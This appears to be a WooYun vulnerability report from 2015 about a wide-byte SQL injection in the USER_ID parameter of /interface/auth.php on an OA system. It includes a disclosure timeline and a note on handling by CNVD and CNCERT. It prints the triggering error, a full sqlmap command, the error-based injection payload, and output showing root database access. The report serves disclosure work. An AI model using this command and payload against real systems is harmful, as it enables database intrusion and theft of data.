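WooYun (WooYun.org) historical vulnerability lookup---http://wy.zone.ci/
WooYun Drops articles, online reader--------http://drop.zone.ci/
2015-10-22: Details reported to the vendor; awaiting vendor handling
2015-10-26: Vendor confirmed; details disclosed to the vendor only
2015-11-05: Details disclosed to core white hats and experts in related fields
2015-11-15: Details disclosed to regular white hats
2015-11-25: Details disclosed to trainee white hats
2015-12-10: Details disclosed to the public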
**.**.**.**/
请联系管理员
错误#1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
SQL语句: select * from EXT_USER where USER_ID='運' '
文件:/interface/auth.php
sqlmap -u "**.**.**.**/interface/auth.php?&PASSWORD=1&USER_ID=%df%27%20" --dbms=mysql --tamper=between
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: USER_ID
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: &PASSWORD=1&USER_ID=%df' AND (SELECT 2136 FROM(SELECT COUNT(*),CONCAT(0x7163746871,(SELECT (CASE WHEN (2136=2136) THEN 1 ELSE 0 END)),0x716e6a7271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- hsor
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
current database: 'td_oa'
current user: 'root@%'
Database: td_oa
[813 tables]
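Severity: High
Vulnerability Rank: 10
Confirmed: 2015-10-26 16:46
CNVD confirmed and reproduced the situation described, and has passed it via CNCERT to China Telecom Group, which will coordinate follow-up handling with the department that manages the website.
None yet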